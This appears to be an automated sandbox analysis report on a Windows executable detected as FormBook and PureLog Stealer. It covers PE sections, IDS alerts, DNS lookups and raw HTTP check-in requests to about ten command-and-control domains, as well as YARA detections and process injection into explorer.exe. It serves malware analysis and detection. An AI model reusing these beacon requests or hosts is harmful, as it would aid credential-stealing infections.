                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x978a80x4f.text
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x980000x1940.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x9a0000xc.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x20000x959000x95a007edf75bf45b49dfc1b28e17b42634c1cFalse0.9652908312447787data7.981823321678096IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rsrc0x980000x19400x1a0011d65322ebc5e356da3d77ef3f4552afFalse0.7663762019230769data7.040864487013515IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0x9a0000xc0x200d8f8be3bb784a6126214ecc93dd72a6dFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_ICON0x981000x12bfPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9020629297770368
                                                    RT_GROUP_ICON0x993d00x14data1.05
                                                    RT_VERSION0x993f40x34cdata0.42890995260663506
                                                    RT_MANIFEST0x997500x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                    Imports

                                                    DLLImport
                                                    mscoree.dll_CorExeMain

                                                    Network Behavior

                                                    Snort IDS Alerts

                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                    07/19/24-10:55:49.050541TCP2031412ET TROJAN FormBook CnC Checkin (GET)4943980192.168.2.844.227.65.245
                                                    07/19/24-10:52:45.942774TCP2031412ET TROJAN FormBook CnC Checkin (GET)4943080192.168.2.8209.196.146.115
                                                    07/19/24-10:54:06.708018TCP2031412ET TROJAN FormBook CnC Checkin (GET)4943580192.168.2.8170.39.213.118
                                                    07/19/24-10:53:46.666794TCP2031412ET TROJAN FormBook CnC Checkin (GET)4943480192.168.2.8206.119.184.155
                                                    07/19/24-10:55:29.005476TCP2031412ET TROJAN FormBook CnC Checkin (GET)4943880192.168.2.8104.18.187.223
                                                    07/19/24-10:54:27.084313TCP2031412ET TROJAN FormBook CnC Checkin (GET)4943680192.168.2.83.64.163.50
                                                    07/19/24-10:54:47.510969TCP2031412ET TROJAN FormBook CnC Checkin (GET)4943780192.168.2.83.33.130.190
                                                    07/19/24-10:56:09.602206TCP2031412ET TROJAN FormBook CnC Checkin (GET)4944080192.168.2.8162.241.244.34
                                                    07/19/24-10:53:06.518711TCP2031412ET TROJAN FormBook CnC Checkin (GET)4943180192.168.2.891.195.240.19
                                                    07/19/24-10:56:32.639578TCP2031412ET TROJAN FormBook CnC Checkin (GET)4944180192.168.2.8206.238.13.219

                                                    Suricata IDS Alerts

                                                    TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                    2024-07-19T10:54:27.594084+0200TCP2031412ET MALWARE FormBook CnC Checkin (GET)4943680192.168.2.83.64.163.50
                                                    2024-07-19T10:52:03.353420+0200TCP2031412ET MALWARE FormBook CnC Checkin (GET)4943880192.168.2.8104.18.187.223
                                                    2024-07-19T10:53:07.100331+0200TCP2031412ET MALWARE FormBook CnC Checkin (GET)4943180192.168.2.891.195.240.19
                                                    2024-07-19T10:52:46.453138+0200TCP2031412ET MALWARE FormBook CnC Checkin (GET)4943080192.168.2.8209.196.146.115
                                                    2024-07-19T10:55:49.562853+0200TCP2031412ET MALWARE FormBook CnC Checkin (GET)4943980192.168.2.844.227.65.245
                                                    2024-07-19T10:54:07.228817+0200TCP2031412ET MALWARE FormBook CnC Checkin (GET)4943580192.168.2.8170.39.213.118
                                                    2024-07-19T10:56:10.109951+0200TCP2031412ET MALWARE FormBook CnC Checkin (GET)4944080192.168.2.8162.241.244.34
                                                    2024-07-19T10:52:03.353420+0200TCP2031412ET MALWARE FormBook CnC Checkin (GET)4943780192.168.2.83.33.130.190
                                                    2024-07-19T10:52:03.353420+0200TCP2031412ET MALWARE FormBook CnC Checkin (GET)4944180192.168.2.8206.238.13.219
                                                    2024-07-19T10:53:47.271174+0200TCP2031412ET MALWARE FormBook CnC Checkin (GET)4943480192.168.2.8206.119.184.155

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jul 19, 2024 10:52:45.934278011 CEST4943080192.168.2.8209.196.146.115
                                                    Jul 19, 2024 10:52:45.939424038 CEST8049430209.196.146.115192.168.2.8
                                                    Jul 19, 2024 10:52:45.942672968 CEST4943080192.168.2.8209.196.146.115
                                                    Jul 19, 2024 10:52:45.942774057 CEST4943080192.168.2.8209.196.146.115
                                                    Jul 19, 2024 10:52:45.947684050 CEST8049430209.196.146.115192.168.2.8
                                                    Jul 19, 2024 10:52:46.447339058 CEST4943080192.168.2.8209.196.146.115
                                                    Jul 19, 2024 10:52:46.453067064 CEST8049430209.196.146.115192.168.2.8
                                                    Jul 19, 2024 10:52:46.453138113 CEST4943080192.168.2.8209.196.146.115
                                                    Jul 19, 2024 10:53:06.510914087 CEST4943180192.168.2.891.195.240.19
                                                    Jul 19, 2024 10:53:06.515911102 CEST804943191.195.240.19192.168.2.8
                                                    Jul 19, 2024 10:53:06.518676043 CEST4943180192.168.2.891.195.240.19
                                                    Jul 19, 2024 10:53:06.518711090 CEST4943180192.168.2.891.195.240.19
                                                    Jul 19, 2024 10:53:06.523663998 CEST804943191.195.240.19192.168.2.8
                                                    Jul 19, 2024 10:53:07.010144949 CEST4943180192.168.2.891.195.240.19
                                                    Jul 19, 2024 10:53:07.100114107 CEST804943191.195.240.19192.168.2.8
                                                    Jul 19, 2024 10:53:07.100331068 CEST4943180192.168.2.891.195.240.19
                                                    Jul 19, 2024 10:53:46.661313057 CEST4943480192.168.2.8206.119.184.155
                                                    Jul 19, 2024 10:53:46.666182995 CEST8049434206.119.184.155192.168.2.8
                                                    Jul 19, 2024 10:53:46.666451931 CEST4943480192.168.2.8206.119.184.155
                                                    Jul 19, 2024 10:53:46.666794062 CEST4943480192.168.2.8206.119.184.155
                                                    Jul 19, 2024 10:53:46.671567917 CEST8049434206.119.184.155192.168.2.8
                                                    Jul 19, 2024 10:53:47.166687965 CEST4943480192.168.2.8206.119.184.155
                                                    Jul 19, 2024 10:53:47.216063023 CEST8049434206.119.184.155192.168.2.8
                                                    Jul 19, 2024 10:53:47.271116972 CEST8049434206.119.184.155192.168.2.8
                                                    Jul 19, 2024 10:53:47.271173954 CEST4943480192.168.2.8206.119.184.155
                                                    Jul 19, 2024 10:54:06.702732086 CEST4943580192.168.2.8170.39.213.118
                                                    Jul 19, 2024 10:54:06.707612038 CEST8049435170.39.213.118192.168.2.8
                                                    Jul 19, 2024 10:54:06.708018064 CEST4943580192.168.2.8170.39.213.118
                                                    Jul 19, 2024 10:54:06.708018064 CEST4943580192.168.2.8170.39.213.118
                                                    Jul 19, 2024 10:54:06.712975979 CEST8049435170.39.213.118192.168.2.8
                                                    Jul 19, 2024 10:54:07.213336945 CEST4943580192.168.2.8170.39.213.118
                                                    Jul 19, 2024 10:54:07.223520994 CEST8049435170.39.213.118192.168.2.8
                                                    Jul 19, 2024 10:54:07.228816986 CEST4943580192.168.2.8170.39.213.118
                                                    Jul 19, 2024 10:54:27.078833103 CEST4943680192.168.2.83.64.163.50
                                                    Jul 19, 2024 10:54:27.083753109 CEST80494363.64.163.50192.168.2.8
                                                    Jul 19, 2024 10:54:27.084245920 CEST4943680192.168.2.83.64.163.50
                                                    Jul 19, 2024 10:54:27.084312916 CEST4943680192.168.2.83.64.163.50
                                                    Jul 19, 2024 10:54:27.089147091 CEST80494363.64.163.50192.168.2.8
                                                    Jul 19, 2024 10:54:27.588129044 CEST4943680192.168.2.83.64.163.50
                                                    Jul 19, 2024 10:54:27.594008923 CEST80494363.64.163.50192.168.2.8
                                                    Jul 19, 2024 10:54:27.594084024 CEST4943680192.168.2.83.64.163.50
                                                    Jul 19, 2024 10:54:47.506005049 CEST4943780192.168.2.83.33.130.190
                                                    Jul 19, 2024 10:54:47.510848045 CEST80494373.33.130.190192.168.2.8
                                                    Jul 19, 2024 10:54:47.510920048 CEST4943780192.168.2.83.33.130.190
                                                    Jul 19, 2024 10:54:47.510968924 CEST4943780192.168.2.83.33.130.190
                                                    Jul 19, 2024 10:54:47.515789986 CEST80494373.33.130.190192.168.2.8
                                                    Jul 19, 2024 10:54:47.982444048 CEST80494373.33.130.190192.168.2.8
                                                    Jul 19, 2024 10:54:47.982496023 CEST80494373.33.130.190192.168.2.8
                                                    Jul 19, 2024 10:54:47.982640028 CEST4943780192.168.2.83.33.130.190
                                                    Jul 19, 2024 10:54:47.982640028 CEST4943780192.168.2.83.33.130.190
                                                    Jul 19, 2024 10:54:47.987586021 CEST80494373.33.130.190192.168.2.8

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jul 19, 2024 10:52:29.938411951 CEST53563671.1.1.1192.168.2.8
                                                    Jul 19, 2024 10:52:45.214251041 CEST6269653192.168.2.81.1.1.1
                                                    Jul 19, 2024 10:52:45.932492971 CEST53626961.1.1.1192.168.2.8
                                                    Jul 19, 2024 10:53:06.198360920 CEST5044453192.168.2.81.1.1.1
                                                    Jul 19, 2024 10:53:06.508316994 CEST53504441.1.1.1192.168.2.8
                                                    Jul 19, 2024 10:53:45.880135059 CEST6058253192.168.2.81.1.1.1
                                                    Jul 19, 2024 10:53:46.659255981 CEST53605821.1.1.1192.168.2.8
                                                    Jul 19, 2024 10:54:06.574753046 CEST5013853192.168.2.81.1.1.1
                                                    Jul 19, 2024 10:54:06.700939894 CEST53501381.1.1.1192.168.2.8
                                                    Jul 19, 2024 10:54:27.050759077 CEST6542353192.168.2.81.1.1.1
                                                    Jul 19, 2024 10:54:27.074752092 CEST53654231.1.1.1192.168.2.8
                                                    Jul 19, 2024 10:54:47.479521036 CEST5875753192.168.2.81.1.1.1
                                                    Jul 19, 2024 10:54:47.505238056 CEST53587571.1.1.1192.168.2.8
                                                    Jul 19, 2024 10:55:08.003603935 CEST5626153192.168.2.81.1.1.1
                                                    Jul 19, 2024 10:55:08.045711994 CEST53562611.1.1.1192.168.2.8
                                                    Jul 19, 2024 10:55:28.464570999 CEST5312653192.168.2.81.1.1.1
                                                    Jul 19, 2024 10:55:28.990845919 CEST53531261.1.1.1192.168.2.8
                                                    Jul 19, 2024 10:55:48.902128935 CEST5419653192.168.2.81.1.1.1
                                                    Jul 19, 2024 10:55:49.043155909 CEST53541961.1.1.1192.168.2.8
                                                    Jul 19, 2024 10:56:09.339133978 CEST5444253192.168.2.81.1.1.1
                                                    Jul 19, 2024 10:56:09.595905066 CEST53544421.1.1.1192.168.2.8
                                                    Jul 19, 2024 10:56:32.073312044 CEST5704553192.168.2.81.1.1.1
                                                    Jul 19, 2024 10:56:32.632416964 CEST53570451.1.1.1192.168.2.8

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Jul 19, 2024 10:52:45.214251041 CEST192.168.2.81.1.1.10xdb85Standard query (0)www.hacks.digitalA (IP address)IN (0x0001)false
                                                    Jul 19, 2024 10:53:06.198360920 CEST192.168.2.81.1.1.10x979dStandard query (0)www.creativelyloud.comA (IP address)IN (0x0001)false
                                                    Jul 19, 2024 10:53:45.880135059 CEST192.168.2.81.1.1.10x1fbeStandard query (0)www.y7rak9.comA (IP address)IN (0x0001)false
                                                    Jul 19, 2024 10:54:06.574753046 CEST192.168.2.81.1.1.10xd241Standard query (0)www.wordcraftart.funA (IP address)IN (0x0001)false
                                                    Jul 19, 2024 10:54:27.050759077 CEST192.168.2.81.1.1.10xed42Standard query (0)www.suv.xyzA (IP address)IN (0x0001)false
                                                    Jul 19, 2024 10:54:47.479521036 CEST192.168.2.81.1.1.10x3a35Standard query (0)www.mirotcg.infoA (IP address)IN (0x0001)false
                                                    Jul 19, 2024 10:55:08.003603935 CEST192.168.2.81.1.1.10xff0Standard query (0)www.mxrkpkngishbdss.xyzA (IP address)IN (0x0001)false
                                                    Jul 19, 2024 10:55:28.464570999 CEST192.168.2.81.1.1.10x1bc8Standard query (0)www.lawyers-br-pt-9390663.fyiA (IP address)IN (0x0001)false
                                                    Jul 19, 2024 10:55:48.902128935 CEST192.168.2.81.1.1.10x7357Standard query (0)www.boostgrowmode.comA (IP address)IN (0x0001)false
                                                    Jul 19, 2024 10:56:09.339133978 CEST192.168.2.81.1.1.10x17c5Standard query (0)www.syedlatief.comA (IP address)IN (0x0001)false
                                                    Jul 19, 2024 10:56:32.073312044 CEST192.168.2.81.1.1.10x8e39Standard query (0)www.gtur.topA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Jul 19, 2024 10:52:45.932492971 CEST1.1.1.1192.168.2.80xdb85No error (0)www.hacks.digital209.196.146.115A (IP address)IN (0x0001)false
                                                    Jul 19, 2024 10:53:06.508316994 CEST1.1.1.1192.168.2.80x979dNo error (0)www.creativelyloud.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                    Jul 19, 2024 10:53:06.508316994 CEST1.1.1.1192.168.2.80x979dNo error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                                    Jul 19, 2024 10:53:46.659255981 CEST1.1.1.1192.168.2.80x1fbeNo error (0)www.y7rak9.comm-m.kkmgxzcdn.comCNAME (Canonical name)IN (0x0001)false
                                                    Jul 19, 2024 10:53:46.659255981 CEST1.1.1.1192.168.2.80x1fbeNo error (0)m-m.kkmgxzcdn.commm.apkdowncdn.comCNAME (Canonical name)IN (0x0001)false
                                                    Jul 19, 2024 10:53:46.659255981 CEST1.1.1.1192.168.2.80x1fbeNo error (0)mm.apkdowncdn.commsdklf.dsaf.apkdowncdn.comCNAME (Canonical name)IN (0x0001)false
                                                    Jul 19, 2024 10:53:46.659255981 CEST1.1.1.1192.168.2.80x1fbeNo error (0)msdklf.dsaf.apkdowncdn.com206.119.184.155A (IP address)IN (0x0001)false
                                                    Jul 19, 2024 10:53:46.659255981 CEST1.1.1.1192.168.2.80x1fbeNo error (0)msdklf.dsaf.apkdowncdn.com206.119.184.153A (IP address)IN (0x0001)false
                                                    Jul 19, 2024 10:53:46.659255981 CEST1.1.1.1192.168.2.80x1fbeNo error (0)msdklf.dsaf.apkdowncdn.com206.119.184.154A (IP address)IN (0x0001)false
                                                    Jul 19, 2024 10:54:06.700939894 CEST1.1.1.1192.168.2.80xd241No error (0)www.wordcraftart.fun170.39.213.118A (IP address)IN (0x0001)false
                                                    Jul 19, 2024 10:54:27.074752092 CEST1.1.1.1192.168.2.80xed42No error (0)www.suv.xyz3.64.163.50A (IP address)IN (0x0001)false
                                                    Jul 19, 2024 10:54:47.505238056 CEST1.1.1.1192.168.2.80x3a35No error (0)www.mirotcg.infomirotcg.infoCNAME (Canonical name)IN (0x0001)false
                                                    Jul 19, 2024 10:54:47.505238056 CEST1.1.1.1192.168.2.80x3a35No error (0)mirotcg.info3.33.130.190A (IP address)IN (0x0001)false
                                                    Jul 19, 2024 10:54:47.505238056 CEST1.1.1.1192.168.2.80x3a35No error (0)mirotcg.info15.197.148.33A (IP address)IN (0x0001)false
                                                    Jul 19, 2024 10:55:08.045711994 CEST1.1.1.1192.168.2.80xff0Server failure (2)www.mxrkpkngishbdss.xyznonenoneA (IP address)IN (0x0001)false
                                                    Jul 19, 2024 10:55:28.990845919 CEST1.1.1.1192.168.2.80x1bc8No error (0)www.lawyers-br-pt-9390663.fyissl1.prod.systemdragon.comCNAME (Canonical name)IN (0x0001)false
                                                    Jul 19, 2024 10:55:28.990845919 CEST1.1.1.1192.168.2.80x1bc8No error (0)ssl1.prod.systemdragon.com104.18.187.223A (IP address)IN (0x0001)false
                                                    Jul 19, 2024 10:55:28.990845919 CEST1.1.1.1192.168.2.80x1bc8No error (0)ssl1.prod.systemdragon.com104.18.188.223A (IP address)IN (0x0001)false
                                                    Jul 19, 2024 10:55:49.043155909 CEST1.1.1.1192.168.2.80x7357No error (0)www.boostgrowmode.compixie.porkbun.comCNAME (Canonical name)IN (0x0001)false
                                                    Jul 19, 2024 10:55:49.043155909 CEST1.1.1.1192.168.2.80x7357No error (0)pixie.porkbun.com44.227.65.245A (IP address)IN (0x0001)false
                                                    Jul 19, 2024 10:55:49.043155909 CEST1.1.1.1192.168.2.80x7357No error (0)pixie.porkbun.com44.227.76.166A (IP address)IN (0x0001)false
                                                    Jul 19, 2024 10:56:09.595905066 CEST1.1.1.1192.168.2.80x17c5No error (0)www.syedlatief.comsyedlatief.comCNAME (Canonical name)IN (0x0001)false
                                                    Jul 19, 2024 10:56:09.595905066 CEST1.1.1.1192.168.2.80x17c5No error (0)syedlatief.com162.241.244.34A (IP address)IN (0x0001)false
                                                    Jul 19, 2024 10:56:32.632416964 CEST1.1.1.1192.168.2.80x8e39No error (0)www.gtur.top206.238.13.219A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • www.hacks.digital
                                                    • www.creativelyloud.com
                                                    • www.y7rak9.com
                                                    • www.wordcraftart.fun
                                                    • www.suv.xyz
                                                    • www.mirotcg.info

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.849430209.196.146.115804084C:\Windows\explorer.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 19, 2024 10:52:45.942774057 CEST159OUTGET /v15n/?JRv=XrEdp4JX&sr=XUieWyy5h/t2CT62Vq8i5x/kR8G+I8pB2jZaxMIrh4lgqb/JgSc0aR4As1Wt1kkrKMMr HTTP/1.1
                                                    Host: www.hacks.digital
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.84943191.195.240.19804084C:\Windows\explorer.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 19, 2024 10:53:06.518711090 CEST164OUTGET /v15n/?sr=3q+gD+8d2JqJcaFj8j5bP1Jm3mKwB6TbJO3aLoAeIjtgFnwNom6OyZtNSFOdFVlOxo+Q&JRv=XrEdp4JX HTTP/1.1
                                                    Host: www.creativelyloud.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.849434206.119.184.155804084C:\Windows\explorer.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 19, 2024 10:53:46.666794062 CEST156OUTGET /v15n/?sr=3ADokGHGfx6TKsz50QsuRVYX3rGFBDL5q/42DkYvURdCZMVWG44MA4Ku4Cx/hAPmB3dD&JRv=XrEdp4JX HTTP/1.1
                                                    Host: www.y7rak9.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.849435170.39.213.118804084C:\Windows\explorer.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 19, 2024 10:54:06.708018064 CEST162OUTGET /v15n/?JRv=XrEdp4JX&sr=90AMgQB2NDTL00GN4iM7gX4woUZ3upfO9yCtQrIdbfLXDlf/PtDiDRZV6/VBSbbmWq2J HTTP/1.1
                                                    Host: www.wordcraftart.fun
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.8494363.64.163.50804084C:\Windows\explorer.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 19, 2024 10:54:27.084312916 CEST153OUTGET /v15n/?sr=vAzU6JYnADLUgEemxRzkUQMY3qynAzl+X72N7mZcinpf+VhfhGS/tUhrfESL21IfICFO&JRv=XrEdp4JX HTTP/1.1
                                                    Host: www.suv.xyz
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.8494373.33.130.190804084C:\Windows\explorer.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 19, 2024 10:54:47.510968924 CEST158OUTGET /v15n/?JRv=XrEdp4JX&sr=eKJokfhRlZ6TJn38gns6VD6cymqx2Da3HErd8WBjDQDJ0kZiIGavcwgaXT3T04xjS0au HTTP/1.1
                                                    Host: www.mirotcg.info
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jul 19, 2024 10:54:47.982444048 CEST339INHTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Fri, 19 Jul 2024 08:54:47 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 199
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4a 52 76 3d 58 72 45 64 70 34 4a 58 26 73 72 3d 65 4b 4a 6f 6b 66 68 52 6c 5a 36 54 4a 6e 33 38 67 6e 73 36 56 44 36 63 79 6d 71 78 32 44 61 33 48 45 72 64 38 57 42 6a 44 51 44 4a 30 6b 5a 69 49 47 61 76 63 77 67 61 58 54 33 54 30 34 78 6a 53 30 61 75 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?JRv=XrEdp4JX&sr=eKJokfhRlZ6TJn38gns6VD6cymqx2Da3HErd8WBjDQDJ0kZiIGavcwgaXT3T04xjS0au"}</script></head></html>


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:04:52:07
                                                    Start date:19/07/2024
                                                    Path:C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe"
                                                    Imagebase:0xd60000
                                                    File size:620'544 bytes
                                                    MD5 hash:F640126D8E76C2A343754FF0F41C1EEF
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1391140026.0000000005A20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1388307588.000000000315B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1388754633.0000000004119000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1388754633.0000000004119000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1388754633.0000000004119000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1388754633.0000000004119000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1388754633.0000000004119000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:3
                                                    Start time:04:52:08
                                                    Start date:19/07/2024
                                                    Path:C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe"
                                                    Imagebase:0x670000
                                                    File size:620'544 bytes
                                                    MD5 hash:F640126D8E76C2A343754FF0F41C1EEF
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:4
                                                    Start time:04:52:09
                                                    Start date:19/07/2024
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\Explorer.EXE
                                                    Imagebase:0x7ff62d7d0000
                                                    File size:5'141'208 bytes
                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000004.00000002.3839526492.0000000010EC9000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    General

                                                    Target ID:5
                                                    Start time:04:52:12
                                                    Start date:19/07/2024
                                                    Path:C:\Windows\SysWOW64\cscript.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\SysWOW64\cscript.exe"
                                                    Imagebase:0x620000
                                                    File size:144'896 bytes
                                                    MD5 hash:CB601B41D4C8074BE8A84AED564A94DC
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.3820022788.0000000003180000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3820022788.0000000003180000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3820022788.0000000003180000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.3820022788.0000000003180000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.3820022788.0000000003180000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.3819748664.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3819748664.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3819748664.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.3819748664.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
